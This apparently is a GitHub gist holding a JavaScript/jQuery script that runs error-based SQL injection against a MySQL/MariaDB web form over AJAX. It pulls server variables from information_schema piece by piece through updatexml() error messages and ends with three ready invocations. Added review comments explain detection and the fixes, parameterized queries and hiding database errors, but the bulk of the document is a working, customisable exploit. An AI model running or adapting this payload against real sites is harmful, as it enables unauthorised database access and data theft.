@maxvyaznikov
Created August 27, 2015 07:29
MySQL/MariaDB SQL Insert Injection through AJAX Exploration Script.
// Delimiters used to locate the extracted value inside the server's response:
// ajax93t411() takes the text between ANS_START and ANS_STOP (see its
// substring() call). The "~" is the 0x7e that inj() places in front of the
// value; the "SQL=" fragment is presumably part of the application's own
// error output. ANS_LIM is the number of characters requested per
// SUBSTRING() call in inj(), i.e. the piece size of each round trip.
// NOTE(review): the whole channel depends on the application returning raw
// DBMS error text to the client; not echoing database errors and building the
// query with parameters instead of concatenation removes it.
var ANS_START = " '~",
    ANS_STOP = "' SQL=",
    ANS_LIM = 31;
// Drives the extraction: issues a chain of AJAX POSTs whose 'feedbacktext'
// field is produced by construct_req(), reassembles each row from pieces of
// at most ANS_LIM characters, and publishes the rows in window.INJ_RESULTS.
//   start_from    - index of the first row to fetch (defaults to 0)
//   lim           - number of rows to fetch; <= 0 means "until a request
//                   errors" (note: `lim || 1` also turns an explicit 0 into 1)
//   construct_req - (start_from, i, offset) => string for the 'feedbacktext'
//                   field; inj() below is the one supplied on this page
// Defender's view: each row costs one POST per ANS_LIM-character piece plus a
// final one that returns an empty piece, all to the same endpoint with the
// same 'type=feedback' field, and every response has to carry raw DBMS error
// text for the substring() below to find anything. Bursts of POSTs to a
// feedback handler and database error messages in responses are the two
// observable points; parameterized queries and suppressed error output are
// the fixes.
function ajax93t411(start_from, lim, construct_req) {
  start_from = start_from || 0;
  lim = lim || 1; // Can be -1. -1 if for "while no Err"
  // One POST. Calls callback(err) on a transport error or when the extracted
  // value equals ANS_ERR, callback(null, answer) otherwise.
  // NOTE(review): ANS_ERR is not declared anywhere in the visible code.
  function req(i, offset, callback) {
    $.ajax({
      //-- All this params is for customization. Feel free
      url: '<path to script>', // placeholder left by the author; no endpoint is named on this page
      method: 'POST',
      data: $.param({
        type: 'feedback',
        feedbacktext: construct_req(start_from, i, offset) // Don't forget about this function to include
      }
      //---
      ),
      success: function(resp) {
        // The value of interest is whatever sits between the two marker
        // strings in the response body (expected to be an echoed error).
        var answer = resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP));
        if (answer == ANS_ERR) {
          callback(answer);
        } else {
          callback(null, answer);
        }
      },
      error: function(jqXHR, textStatus) {
        callback(textStatus);
      }
    });
  }
  // Fetches one row (index i) piece by piece: keeps requesting at
  // offset + answer.length until an empty piece comes back, then appends the
  // reassembled row to the page and hands it to next(err, full_answer).
  // NOTE(review): full_answer is DBMS-derived text inserted as raw HTML, so
  // any markup contained in the data is rendered by the browser running this.
  function constructReq(i, full_answer, offset, next) {
    req(i, offset, function(err, answer) {
      if (err) return next(err, full_answer);
      full_answer += answer;
      if (answer.length > 0) {
        constructReq(i, full_answer, offset + answer.length, next);
      } else {
        $('body').append('<p>'+ full_answer +'</p>'); // Include each new result into webpage of target site. Just for usability.
        next(null, full_answer);
      }
    });
  }
  // Fetches rows i .. lim-1 one after another, accumulating into results;
  // stops early with callback(err, results) on the first error.
  function timesSeries(lim, i, results, callback) {
    if (i < lim) {
      constructReq(i, '', 1, function(err, answer) {
        if (err) return callback(err, results);
        results.push(answer);
        timesSeries(lim, i + 1, results, callback);
      });
    } else {
      callback(null, results);
    }
  }
  // Fetches rows from i upward with no upper bound; the only exit is an error
  // reported by req() (e.g. the row index running past the result set).
  function untilErrSeries(i, results, callback) {
    constructReq(i, '', 1, function(err, answer) {
      if (err) return callback(err, results);
      results.push(answer);
      untilErrSeries(i + 1, results, callback);
    });
  }
  // Final callback: logs the terminating error, if any, and publishes results.
  function complete(err, results) {
    if (err) console.error(err);
    window.INJ_RESULTS = results; // Keep all results into the global variable. Just for usability.
    console.log('Done');
  }
  $('body').append('<p><b>New Request!</b></p>');
  if (lim > 0) {
    timesSeries(lim, 0, [], complete);
  } else { // lim < 0
    untilErrSeries(0, [], complete);
  }
}
//=== Examples:
// Glob. vars from DBMS
// Example construct_req for ajax93t411(): the string that ends up in the
// 'feedbacktext' field. It closes the surrounding quoted literal and calls
// updatexml() with an argument built from SUBSTRING(offset, ANS_LIM) of
// "VARIABLE_NAME:VARIABLE_VALUE" for row start_from + i of
// information_schema.GLOBAL_VARIABLES; 0x7e is the '~' that ANS_START later
// looks for, presumably in an error message the DBMS raises for that argument.
// Defender's view: this only works because the field is concatenated into the
// SQL statement and the resulting DBMS error is returned to the client. A
// parameterized query turns the string into inert data, and not echoing
// database errors closes the read-back channel even where concatenation
// remains.
function inj(start_from, i, offset) {
  return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':', VARIABLE_NAME, VARIABLE_VALUE), "+ offset +", "+ ANS_LIM +") FROM information_schema.GLOBAL_VARIABLES LIMIT "+ (start_from + i) +",1)), 0) or '"
}
// The three invocations the author left in the gist. Each starts its own
// AJAX chain immediately, so as written all three appear to run concurrently
// against the same endpoint: every row until an error, the first row only,
// and six rows starting at row 5. Each call overwrites window.INJ_RESULTS
// when it finishes.
ajax93t411(0, -1, inj); // All together
ajax93t411(0, 1, inj); // Only first one
ajax93t411(5, 6, inj); // 6 rows, begining from 5th